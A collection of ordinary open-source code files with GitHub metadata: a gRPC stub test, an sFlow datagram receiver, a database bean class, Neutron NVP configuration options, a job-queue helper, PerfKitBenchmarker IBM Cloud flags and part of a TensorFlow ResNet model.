    stub = create_stub()
    result = stub.create_selection(
        request=executor_pb2.CreateSelectionRequest())
    instance.CreateSelection.assert_called_once()
    self.assertEqual(result, response)

  def test_create_selection_raises_retryable_error_on_grpc_error_unavailable(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateSelection = mock.Mock(
        side_effect=_raise_grpc_error_unavailable)
    stub = create_stub()
    with self.assertRaises(executors_errors.RetryableError):
      stub.create_selection(request=executor_pb2.CreateSelectionRequest())

  def test_create_selection_reraises_non_retryable_grpc_error(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateSelection = mock.Mock(
        side_effect=_raise_non_retryable_grpc_error)
    stub = create_stub()
    with self.assertRaises(grpc.RpcError) as context:
      stub.create_selection(request=executor_pb2.CreateSelectionRequest())
    self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)

  def test_create_selection_reraises_type_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateSelection = mock.Mock(side_effect=TypeError)
    stub = create_stub()
    with self.assertRaises(TypeError):
      stub.create_selection(request=executor_pb2.CreateSelectionRequest())
# Standard absl test entry point.
if __name__ == '__main__':
  absltest.main()
| {
"content_hash": "420eb4a31d8bcc39e36c979f655170ff",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 85,
"avg_line_length": 38.49230769230769,
"alnum_prop": 0.7437050359712231,
"repo_name": "tensorflow/federated",
"id": "f143f8128eadd6580b3a4bba9ce60c5c9bc1edd3",
"size": "10607",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow_federated/python/core/impl/executors/remote_executor_grpc_stub_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "729470"
},
{
"name": "Dockerfile",
"bytes": "1983"
},
{
"name": "Python",
"bytes": "6700736"
},
{
"name": "Shell",
"bytes": "7123"
},
{
"name": "Starlark",
"bytes": "387382"
}
],
"symlink_target": ""
} |
"""
.. module:: server
:synopsis: SFlow UDP server
.. moduleauthor:: Colin Alston <colin@imcol.in>
"""
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor
from duct.protocol.sflow import protocol
from duct.protocol.sflow.protocol import flows, counters
class DatagramReceiver(DatagramProtocol):
    """DatagramReceiver for sFlow packets.

    Decodes each incoming datagram and schedules the ``receive_*`` hook
    methods (meant to be overridden by subclasses) on the reactor.
    """

    def datagramReceived(self, data, address):
        """Parse one sFlow datagram and dispatch its samples."""
        host, _port = address
        sflow = protocol.Sflow(data, host)
        for sample in sflow.samples:
            if isinstance(sample, protocol.FlowSample):
                self.process_flow_sample(sflow, sample)
            if isinstance(sample, protocol.CounterSample):
                self.process_counter_sample(sflow, sample)

    def process_flow_sample(self, sflow, flow):
        """Process an incoming flow sample: dispatch decoded header frames."""
        for entry in flow.flows.values():
            if isinstance(entry, flows.HeaderSample) and entry.frame:
                reactor.callLater(0, self.receive_flow, flow, entry.frame,
                                  sflow.host)

    def process_counter_sample(self, sflow, counter):
        """Process an incoming counter sample: dispatch counters to hooks."""
        for entry in counter.counters.values():
            if isinstance(entry, counters.InterfaceCounters):
                reactor.callLater(0, self.receive_counter, entry, sflow.host)
            elif isinstance(entry, counters.HostCounters):
                # BUG FIX: receive_host_counter declares a `host` parameter
                # but was previously scheduled without one, so the callback
                # raised TypeError when it fired.  Pass the source host to
                # match the hook's signature.
                reactor.callLater(0, self.receive_host_counter, entry,
                                  sflow.host)

    def receive_flow(self, flow, sample, host):
        """Called when a flow is received; default is a no-op hook."""

    def receive_counter(self, counter, host):
        """Called when a counter is received; default is a no-op hook."""

    def receive_host_counter(self, counter, host):
        """Called when a host counter is received; default is a no-op hook."""
| {
"content_hash": "701b316c7b3057c6f2893461550361df",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 73,
"avg_line_length": 31.796610169491526,
"alnum_prop": 0.6210021321961621,
"repo_name": "ducted/duct",
"id": "4ee70d52a7b79f341bf95dac9843f976d001e691",
"size": "1876",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "duct/protocol/sflow/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "507"
},
{
"name": "HTML",
"bytes": "1429"
},
{
"name": "Puppet",
"bytes": "2736"
},
{
"name": "Python",
"bytes": "309584"
},
{
"name": "Ruby",
"bytes": "1756"
},
{
"name": "Shell",
"bytes": "8041"
}
],
"symlink_target": ""
} |
''' dbrev.nv_arg can be thought of as a bean or a template. It
has only attributes with getters and setters.
'''
import logging
LOG = logging.getLogger(__name__)
# LOG.setLevel(logging.INFO)
# Long lines expected.
# pylint: disable=C0301
# Cyclic imports protected by functions
# pylint: disable=R0401
class NvArg(object):
    '''NvArg class generated from NV_ARGS table.

    A bean/template: plain attributes plus the lazily-resolved ``namespace``
    and ``session`` relations, which are looked up from their tables the
    first time they are accessed.
    '''
    def __init__(self, namespace_name=None, name=None, value=None, session_id=None):
        self.namespace_name = namespace_name
        self.name = name
        self.value = value
        self.session_id = session_id
        # Lazily-populated relation caches; see the properties below.
        self._namespace = None
        self._session = None
    def __str__(self):
        # Fixes: identity comparison with None (was `!= None`) and fragile
        # string concatenation with trailing-comma stripping (now join).
        parts = []
        if self.namespace_name is not None:
            parts.append('namespace_name:' + str(self.namespace_name))
        if self.name is not None:
            parts.append('name:' + str(self.name))
        if self.value is not None:
            parts.append('value:' + str(self.value))
        if self.session_id is not None:
            parts.append('session_id:' + str(self.session_id))
        return 'NvArg(' + ','.join(parts) + ')'
    def get_namespace(self):
        ''' Getter method for namespace; resolved on first access.'''
        if self.namespace_name is not None and self._namespace is None:
            # Imported here to avoid a cyclic import at module load time.
            from freevolv.models.dbrev import nv_arg_namespaces_table
            self._namespace = nv_arg_namespaces_table.NvArgNamespacesTable.get_instance() \
                .get_one(name=self.namespace_name)
        return self._namespace
    def set_namespace(self, namespace):
        ''' Setter method for namespace.'''
        self._namespace = namespace
    namespace = property(get_namespace, set_namespace)
    def get_session(self):
        ''' Getter method for session; resolved on first access.'''
        if self.session_id is not None and self._session is None:
            # Imported here to avoid a cyclic import at module load time.
            from freevolv.models.dbrev import sessions_table
            self._session = sessions_table.SessionsTable.get_instance() \
                .get_one(oid=self.session_id)
        return self._session
    def set_session(self, session):
        ''' Setter method for session.'''
        self._session = session
    session = property(get_session, set_session)
| {
"content_hash": "08e964114ad70a86f4511cf1f7b5f042",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 91,
"avg_line_length": 35.41269841269841,
"alnum_prop": 0.5934558493948902,
"repo_name": "genevolv/dbrev",
"id": "2a41094c8eaa4c70c000af275969572f34f8ba41",
"size": "2231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py/freevolv/models/dbrev/nv_arg.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "306037"
}
],
"symlink_target": ""
} |
from oslo.config import cfg
class AgentModes:
    """Valid values for the [NVP] agent_mode option."""
    AGENT = 'agent'
    # TODO(armando-migliaccio): support to be added, maybe we could add a
    # mixed mode to support no-downtime migrations?
    AGENTLESS = 'agentless'
class MetadataModes:
    """Valid values for the [NVP] metadata_mode option."""
    DIRECT = 'access_network'
    INDIRECT = 'dhcp_host_route'
# Plugin tuning options, registered under the [NVP] section.
nvp_opts = [
    cfg.IntOpt('max_lp_per_bridged_ls', default=5000,
               help=_("Maximum number of ports of a logical switch on a "
                      "bridged transport zone (default 5000)")),
    cfg.IntOpt('max_lp_per_overlay_ls', default=256,
               help=_("Maximum number of ports of a logical switch on an "
                      "overlay transport zone (default 256)")),
    cfg.IntOpt('concurrent_connections', default=10,
               help=_("Maximum concurrent connections to each NVP "
                      "controller.")),
    cfg.IntOpt('nvp_gen_timeout', default=-1,
               help=_("Number of seconds a generation id should be valid for "
                      "(default -1 meaning do not time out)")),
    cfg.StrOpt('metadata_mode', default=MetadataModes.DIRECT,
               help=_("If set to access_network this enables a dedicated "
                      "connection to the metadata proxy for metadata server "
                      "access via Neutron router. If set to dhcp_host_route "
                      "this enables host route injection via the dhcp agent. "
                      "This option is only useful if running on a host that "
                      "does not support namespaces otherwise access_network "
                      "should be used.")),
    cfg.StrOpt('default_transport_type', default='stt',
               help=_("The default network tranport type to use (stt, gre, "
                      "bridge, ipsec_gre, or ipsec_stt)")),
    cfg.StrOpt('agent_mode', default=AgentModes.AGENT,
               help=_("The mode used to implement DHCP/metadata services."))
]
# Backend state synchronization tuning, registered under [NVP_SYNC].
sync_opts = [
    cfg.IntOpt('state_sync_interval', default=120,
               help=_("Interval in seconds between runs of the state "
                      "synchronization task. Set it to 0 to disable it")),
    cfg.IntOpt('max_random_sync_delay', default=0,
               help=_("Maximum value for the additional random "
                      "delay in seconds between runs of the state "
                      "synchronization task")),
    cfg.IntOpt('min_sync_req_delay', default=10,
               help=_('Minimum delay, in seconds, between two state '
                      'synchronization queries to NVP. It must not '
                      'exceed state_sync_interval')),
    cfg.IntOpt('min_chunk_size', default=500,
               help=_('Minimum number of resources to be retrieved from NVP '
                      'during state synchronization')),
    cfg.BoolOpt('always_read_status', default=False,
                help=_('Always read operational status from backend on show '
                       'operations. Enabling this option might slow down '
                       'the system.'))
]
# Controller connection/credential options, registered in the default group.
connection_opts = [
    cfg.StrOpt('nvp_user',
               default='admin',
               help=_('User name for NVP controllers in this cluster')),
    cfg.StrOpt('nvp_password',
               default='admin',
               secret=True,
               help=_('Password for NVP controllers in this cluster')),
    cfg.IntOpt('req_timeout',
               default=30,
               help=_('Total time limit for a cluster request')),
    cfg.IntOpt('http_timeout',
               default=10,
               help=_('Time before aborting a request')),
    cfg.IntOpt('retries',
               default=2,
               help=_('Number of time a request should be retried')),
    cfg.IntOpt('redirects',
               default=2,
               help=_('Number of times a redirect should be followed')),
    cfg.ListOpt('nvp_controllers',
                help=_("Lists the NVP controllers in this cluster")),
]
# Default cluster resource identifiers, registered in the default group.
cluster_opts = [
    cfg.StrOpt('default_tz_uuid',
               help=_("This is uuid of the default NVP Transport zone that "
                      "will be used for creating tunneled isolated "
                      "\"Neutron\" networks. It needs to be created in NVP "
                      "before starting Neutron with the nvp plugin.")),
    cfg.StrOpt('default_l3_gw_service_uuid',
               help=_("Unique identifier of the NVP L3 Gateway service "
                      "which will be used for implementing routers and "
                      "floating IPs")),
    cfg.StrOpt('default_l2_gw_service_uuid',
               help=_("Unique identifier of the NVP L2 Gateway service "
                      "which will be used by default for network gateways")),
    cfg.StrOpt('default_service_cluster_uuid',
               help=_("Unique identifier of the Service Cluster which will "
                      "be used by logical services like dhcp and metadata")),
    cfg.StrOpt('default_interface_name', default='breth0',
               help=_("Name of the interface on a L2 Gateway transport node"
                      "which should be used by default when setting up a "
                      "network connection")),
]
# Default polling interval (ms) for VCNS task status checks.
DEFAULT_STATUS_CHECK_INTERVAL = 2000
# VMware vShield/NSX Edge manager options, registered under [vcns].
vcns_opts = [
    cfg.StrOpt('user',
               default='admin',
               help=_('User name for vsm')),
    cfg.StrOpt('password',
               default='default',
               secret=True,
               help=_('Password for vsm')),
    cfg.StrOpt('manager_uri',
               help=_('uri for vsm')),
    cfg.StrOpt('datacenter_moid',
               help=_('Optional parameter identifying the ID of datacenter '
                      'to deploy NSX Edges')),
    cfg.StrOpt('deployment_container_id',
               help=_('Optional parameter identifying the ID of datastore to '
                      'deploy NSX Edges')),
    cfg.StrOpt('resource_pool_id',
               help=_('Optional parameter identifying the ID of resource to '
                      'deploy NSX Edges')),
    cfg.StrOpt('datastore_id',
               help=_('Optional parameter identifying the ID of datastore to '
                      'deploy NSX Edges')),
    cfg.StrOpt('external_network',
               help=_('Network ID for physical network connectivity')),
    cfg.IntOpt('task_status_check_interval',
               default=DEFAULT_STATUS_CHECK_INTERVAL,
               help=_("Task status check interval"))
]
# Register the configuration options
cfg.CONF.register_opts(connection_opts)
cfg.CONF.register_opts(cluster_opts)
cfg.CONF.register_opts(nvp_opts, "NVP")
cfg.CONF.register_opts(sync_opts, "NVP_SYNC")
cfg.CONF.register_opts(vcns_opts, group="vcns")
| {
"content_hash": "a927fa5d5d98480348f12b762fc83d54",
"timestamp": "",
"source": "github",
"line_count": 147,
"max_line_length": 78,
"avg_line_length": 45.666666666666664,
"alnum_prop": 0.5724713242961418,
"repo_name": "ntt-sic/neutron",
"id": "12306b030fcb8fc588a0eade4b9f65f6f7b0859f",
"size": "7363",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/plugins/nicira/common/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "7243854"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
"""
byceps.util.jobqueue
~~~~~~~~~~~~~~~~~~~~
An asynchronously processed job queue based on Redis_ and RQ_.
.. _Redis: http://redis.io/
.. _RQ: http://python-rq.org/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from contextlib import contextmanager
from flask import current_app
from rq import Connection, Queue
from byceps.redis import redis
@contextmanager
def connection():
    """Provide an RQ connection context bound to the app's Redis client."""
    with Connection(redis.client):
        yield
def get_queue(app):
    """Return the RQ queue; jobs run inline when ``JOBS_ASYNC`` is false."""
    return Queue(is_async=app.config['JOBS_ASYNC'])
def enqueue(*args, **kwargs):
    """Add the function call to the queue as a job."""
    with connection():
        get_queue(current_app).enqueue(*args, **kwargs)
| {
"content_hash": "ec2cc497540f2bb84a78568949884a04",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 62,
"avg_line_length": 20.945945945945947,
"alnum_prop": 0.672258064516129,
"repo_name": "m-ober/byceps",
"id": "986ea4f067dad9c228713d9e7017ba6b28cff32f",
"size": "775",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "byceps/util/jobqueue.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38499"
},
{
"name": "Dockerfile",
"bytes": "1302"
},
{
"name": "HTML",
"bytes": "369989"
},
{
"name": "JavaScript",
"bytes": "9483"
},
{
"name": "Python",
"bytes": "1152996"
}
],
"symlink_target": ""
} |
from clld.web.app import get_configurator
# we must make sure custom models are known at database initialization!
from autotyp import models
def main(global_config, **settings):
    """Return a Pyramid WSGI application for the autotyp app."""
    config = get_configurator('autotyp', settings=settings)
    # Register the app-specific datatables and adapters packages.
    for component in ('autotyp.datatables', 'autotyp.adapters'):
        config.include(component)
    return config.make_wsgi_app()
| {
"content_hash": "4fc305f5fc4b6658af697eb587b7403e",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 32.38461538461539,
"alnum_prop": 0.7363420427553444,
"repo_name": "clld/autotyp",
"id": "0590e97614cce057479548f4409427ee826a6c4c",
"size": "421",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autotyp/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1"
},
{
"name": "JavaScript",
"bytes": "1"
},
{
"name": "Python",
"bytes": "21342"
}
],
"symlink_target": ""
} |
"""Module containing flags applicable across benchmark run on IBM Cloud."""
from absl import flags
flags.DEFINE_string('ibmcloud_azone', None,
'IBMCloud internal DC name')
flags.DEFINE_integer('ibmcloud_volume_iops', 20000,
'Desired volume IOPS.')
flags.DEFINE_integer('ibmcloud_volume_bandwidth', None,
'Desired volume bandwidth in Mbps.')
flags.DEFINE_boolean('ibmcloud_volume_encrypted', False,
'Enable encryption on volume creates.')
flags.DEFINE_string('ibmcloud_image_username', 'root',
'Ssh username for cloud image.')
flags.DEFINE_integer('ibmcloud_polling_delay', 2,
'Delay between polling attempts in seconds.')
flags.DEFINE_integer('ibmcloud_timeout', 600,
'timeout in secs.')
flags.DEFINE_integer('ibmcloud_boot_disk_size', 10,
'boot volume disk size.')
flags.DEFINE_boolean('ibmcloud_debug', False,
'debug flag.')
flags.DEFINE_boolean('ibmcloud_resources_keep', False,
'keep resources.')
flags.DEFINE_string('ibmcloud_volume_profile', 'custom',
'volume profile')
flags.DEFINE_string('ibmcloud_bootvol_encryption_key', None,
'boot volume encryption key crn')
flags.DEFINE_string('ibmcloud_datavol_encryption_key', None,
'data volume encryption key crn')
flags.DEFINE_string('ibmcloud_vpcid', None,
'IBM Cloud vpc id')
flags.DEFINE_string('ibmcloud_subnet', None,
'primary subnet id')
flags.DEFINE_string('ibmcloud_networks', None,
'additional network ids, comma separated')
flags.DEFINE_string('ibmcloud_prefix', 'perfkit',
'resource name prefix')
flags.DEFINE_string('ibmcloud_rgid', None,
'Resource Group id for the account.')
flags.DEFINE_integer('ibmcloud_boot_volume_iops', 3000,
'boot voume iops')
flags.DEFINE_integer('ibmcloud_boot_volume_size', 0,
'boot voume size in GB')
flags.DEFINE_string('ibmcloud_pub_keyid', None,
'rias public sshkey id')
flags.DEFINE_integer('ibmcloud_network_mtu', 9000,
'MTU size on network interfaces.')
flags.DEFINE_integer('ibmcloud_subnets_extra', 0,
'extra subnets to lookup')
flags.DEFINE_integer('ibmcloud_vdisks_extra', 0,
'extra disks to create')
flags.DEFINE_string('ibmcloud_image_info', None,
'image info in json formatted file')
flags.DEFINE_boolean('ibmcloud_encrypted_image', False,
'encrypted image.')
| {
"content_hash": "19a63d68ace0419ada77c700ebc5b83e",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 75,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.6087275394206088,
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"id": "37964fe5ef397296275522b31af654802f9c7a91",
"size": "3337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/providers/ibmcloud/flags.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3420"
},
{
"name": "HTML",
"bytes": "113073"
},
{
"name": "Jinja",
"bytes": "62005"
},
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "6076512"
},
{
"name": "R",
"bytes": "1017"
},
{
"name": "Shell",
"bytes": "76164"
},
{
"name": "Tcl",
"bytes": "14601"
}
],
"symlink_target": ""
} |
""" TensorFlow ResNet model."""
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import ACT2FN
from ...modeling_tf_outputs import (
TFBaseModelOutputWithNoAttention,
TFBaseModelOutputWithPoolingAndNoAttention,
TFImageClassifierOutputWithNoAttention,
)
from ...modeling_tf_utils import TFPreTrainedModel, TFSequenceClassificationLoss, keras_serializable, unpack_inputs
from ...tf_utils import shape_list
from ...utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_resnet import ResNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "ResNetConfig"
_FEAT_EXTRACTOR_FOR_DOC = "AutoFeatureExtractor"
# Base docstring
_CHECKPOINT_FOR_DOC = "microsoft/resnet-50"
_EXPECTED_OUTPUT_SHAPE = [1, 2048, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "microsoft/resnet-50"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tiger cat"
TF_RESNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/resnet-50",
# See all resnet models at https://huggingface.co/models?filter=resnet
]
class TFResNetConvLayer(tf.keras.layers.Layer):
    """Convolution + batch norm + activation, with explicit padding so the
    "valid" convolution matches PyTorch's implicitly padded ``Conv2d``."""

    def __init__(
        self, out_channels: int, kernel_size: int = 3, stride: int = 1, activation: str = "relu", **kwargs
    ) -> None:
        super().__init__(**kwargs)
        self.pad_value = kernel_size // 2
        self.conv = tf.keras.layers.Conv2D(
            out_channels, kernel_size=kernel_size, strides=stride, padding="valid", use_bias=False, name="convolution"
        )
        # Use same default momentum and epsilon as PyTorch equivalent
        self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
        if activation is not None:
            self.activation = ACT2FN[activation]
        else:
            self.activation = tf.keras.layers.Activation("linear")

    def convolution(self, hidden_state: tf.Tensor) -> tf.Tensor:
        # Pad height and width symmetrically (NHWC layout), mirroring PyTorch Conv2d padding.
        pad = (self.pad_value, self.pad_value)
        padded = tf.pad(hidden_state, [(0, 0), pad, pad, (0, 0)])
        return self.conv(padded)

    def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
        return self.activation(self.normalization(self.convolution(hidden_state), training=training))
class TFResNetEmbeddings(tf.keras.layers.Layer):
    """
    ResNet Embeddings (stem) composed of a single aggressive convolution.
    """

    def __init__(self, config: ResNetConfig, **kwargs) -> None:
        super().__init__(**kwargs)
        self.embedder = TFResNetConvLayer(
            config.embedding_size,
            kernel_size=7,
            stride=2,
            activation=config.hidden_act,
            name="embedder",
        )
        self.pooler = tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding="valid", name="pooler")
        self.num_channels = config.num_channels

    def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
        num_channels = shape_list(pixel_values)[-1]
        # Channel count can only be validated eagerly; symbolic tensors may be unknown.
        if tf.executing_eagerly() and num_channels != self.num_channels:
            raise ValueError(
                "Make sure that the channel dimension of the pixel values match with the one set in the configuration."
            )
        embedding = self.embedder(pixel_values)
        # Pad manually so the "valid" max pool matches PyTorch's padded pooling.
        embedding = tf.pad(embedding, [[0, 0], [1, 1], [1, 1], [0, 0]])
        return self.pooler(embedding)
class TFResNetShortCut(tf.keras.layers.Layer):
    """
    ResNet shortcut, used to project the residual features to the correct size. If needed, it is also used to
    downsample the input using `stride=2`.
    """

    def __init__(self, out_channels: int, stride: int = 2, **kwargs) -> None:
        super().__init__(**kwargs)
        self.convolution = tf.keras.layers.Conv2D(
            out_channels, kernel_size=1, strides=stride, use_bias=False, name="convolution"
        )
        # Use same default momentum and epsilon as PyTorch equivalent
        self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")

    def call(self, x: tf.Tensor, training: bool = False) -> tf.Tensor:
        # 1x1 projection followed by batch norm; no activation on the shortcut path.
        return self.normalization(self.convolution(x), training=training)
class TFResNetBasicLayer(tf.keras.layers.Layer):
    """
    A classic ResNet's residual layer composed by two `3x3` convolutions.
    """

    def __init__(
        self, in_channels: int, out_channels: int, stride: int = 1, activation: str = "relu", **kwargs
    ) -> None:
        super().__init__(**kwargs)
        # The residual needs a projection whenever shape or stride changes it.
        needs_projection = in_channels != out_channels or stride != 1
        self.conv1 = TFResNetConvLayer(out_channels, stride=stride, name="layer.0")
        self.conv2 = TFResNetConvLayer(out_channels, activation=None, name="layer.1")
        if needs_projection:
            self.shortcut = TFResNetShortCut(out_channels, stride=stride, name="shortcut")
        else:
            self.shortcut = tf.keras.layers.Activation("linear", name="shortcut")
        self.activation = ACT2FN[activation]

    def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
        residual = self.shortcut(hidden_state, training=training)
        hidden_state = self.conv1(hidden_state, training=training)
        hidden_state = self.conv2(hidden_state, training=training)
        hidden_state += residual
        return self.activation(hidden_state)
class TFResNetBottleNeckLayer(tf.keras.layers.Layer):
    """
    A classic ResNet's bottleneck residual layer composed of three convolutions: `1x1`, `3x3`, `1x1`.
    The first `1x1` convolution reduces the input by a factor of `reduction` in order to make the second `3x3`
    convolution faster. The last `1x1` convolution remaps the reduced features to `out_channels`.
    """
    def __init__(
        self,
        in_channels: int,
        out_channels: int,
        stride: int = 1,
        activation: str = "relu",
        reduction: int = 4,
        **kwargs
    ) -> None:
        super().__init__(**kwargs)
        # A projection shortcut is only needed when the residual's shape would differ.
        should_apply_shortcut = in_channels != out_channels or stride != 1
        reduces_channels = out_channels // reduction
        self.conv0 = TFResNetConvLayer(reduces_channels, kernel_size=1, name="layer.0")
        self.conv1 = TFResNetConvLayer(reduces_channels, stride=stride, name="layer.1")
        # No activation on the last conv: it is applied after the residual addition below.
        self.conv2 = TFResNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.2")
        self.shortcut = (
            TFResNetShortCut(out_channels, stride=stride, name="shortcut")
            if should_apply_shortcut
            else tf.keras.layers.Activation("linear", name="shortcut")
        )
        self.activation = ACT2FN[activation]
    def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
        residual = hidden_state
        hidden_state = self.conv0(hidden_state, training=training)
        hidden_state = self.conv1(hidden_state, training=training)
        hidden_state = self.conv2(hidden_state, training=training)
        residual = self.shortcut(residual, training=training)
        hidden_state += residual
        hidden_state = self.activation(hidden_state)
        return hidden_state
class TFResNetStage(tf.keras.layers.Layer):
    """
    A ResNet stage composed of stacked layers.
    """

    def __init__(
        self, config: ResNetConfig, in_channels: int, out_channels: int, stride: int = 2, depth: int = 2, **kwargs
    ) -> None:
        super().__init__(**kwargs)
        layer_cls = TFResNetBottleNeckLayer if config.layer_type == "bottleneck" else TFResNetBasicLayer
        # Only the first layer changes channel count / stride; the rest keep the shape.
        stage_layers = [layer_cls(in_channels, out_channels, stride=stride, activation=config.hidden_act, name="layers.0")]
        for i in range(depth - 1):
            stage_layers.append(
                layer_cls(out_channels, out_channels, activation=config.hidden_act, name=f"layers.{i + 1}")
            )
        self.stage_layers = stage_layers

    def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
        for stage_layer in self.stage_layers:
            hidden_state = stage_layer(hidden_state, training=training)
        return hidden_state
class TFResNetEncoder(tf.keras.layers.Layer):
    """Stack of ResNet stages; optionally collects per-stage hidden states."""
    def __init__(self, config: ResNetConfig, **kwargs) -> None:
        super().__init__(**kwargs)
        # based on `downsample_in_first_stage` the first layer of the first stage may or may not downsample the input
        self.stages = [
            TFResNetStage(
                config,
                config.embedding_size,
                config.hidden_sizes[0],
                stride=2 if config.downsample_in_first_stage else 1,
                depth=config.depths[0],
                name="stages.0",
            )
        ]
        # Remaining stages pair consecutive hidden sizes: (sizes[i], sizes[i+1]).
        for i, (in_channels, out_channels, depth) in enumerate(
            zip(config.hidden_sizes, config.hidden_sizes[1:], config.depths[1:])
        ):
            self.stages.append(TFResNetStage(config, in_channels, out_channels, depth=depth, name=f"stages.{i + 1}"))
    def call(
        self,
        hidden_state: tf.Tensor,
        output_hidden_states: bool = False,
        return_dict: bool = True,
        training: bool = False,
    ) -> TFBaseModelOutputWithNoAttention:
        """Run all stages; `hidden_states` holds each stage's *input* plus the final output."""
        hidden_states = () if output_hidden_states else None
        for stage_module in self.stages:
            # Record the state *before* each stage so the initial embedding is included.
            if output_hidden_states:
                hidden_states = hidden_states + (hidden_state,)
            hidden_state = stage_module(hidden_state, training=training)
        if output_hidden_states:
            hidden_states = hidden_states + (hidden_state,)
        if not return_dict:
            # Tuple form: drop the `hidden_states` entry entirely when it is None.
            return tuple(v for v in [hidden_state, hidden_states] if v is not None)
        return TFBaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
class TFResNetPreTrainedModel(TFPreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = ResNetConfig
    base_model_prefix = "resnet"
    main_input_name = "pixel_values"
    @property
    def dummy_inputs(self) -> Dict[str, tf.Tensor]:
        """
        Dummy inputs to build the network. Returns:
            `Dict[str, tf.Tensor]`: The dummy inputs.
        """
        # Batch of 3, NCHW layout, 224x224 — matching the expected pixel_values format.
        VISION_DUMMY_INPUTS = tf.random.uniform(shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32)
        return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
    @tf.function(
        input_signature=[
            {
                # Fully dynamic shape so any batch/channel/spatial size can be served.
                "pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
            }
        ]
    )
    def serving(self, inputs):
        """SavedModel serving entry point: forward pass + output post-processing."""
        output = self.call(inputs)
        return self.serving_output(output)
RESNET_START_DOCSTRING = r"""
This model is a TensorFlow
[tf.keras.layers.Layer](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Layer) sub-class. Use it as a
regular TensorFlow Module and refer to the TensorFlow documentation for all matter related to general usage and
behavior.
Parameters:
config ([`ResNetConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
RESNET_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoFeatureExtractor`]. See
[`AutoFeatureExtractor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@keras_serializable
class TFResNetMainLayer(tf.keras.layers.Layer):
    """Core ResNet computation: embeddings (stem), encoder stages, and global average pooling."""
    config_class = ResNetConfig
    def __init__(self, config: ResNetConfig, **kwargs) -> None:
        super().__init__(**kwargs)
        self.config = config
        self.embedder = TFResNetEmbeddings(config, name="embedder")
        self.encoder = TFResNetEncoder(config, name="encoder")
        # keepdims=True preserves the spatial dims as 1x1 so outputs stay 4-D.
        self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True)
    @unpack_inputs
    def call(
        self,
        pixel_values: tf.Tensor,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
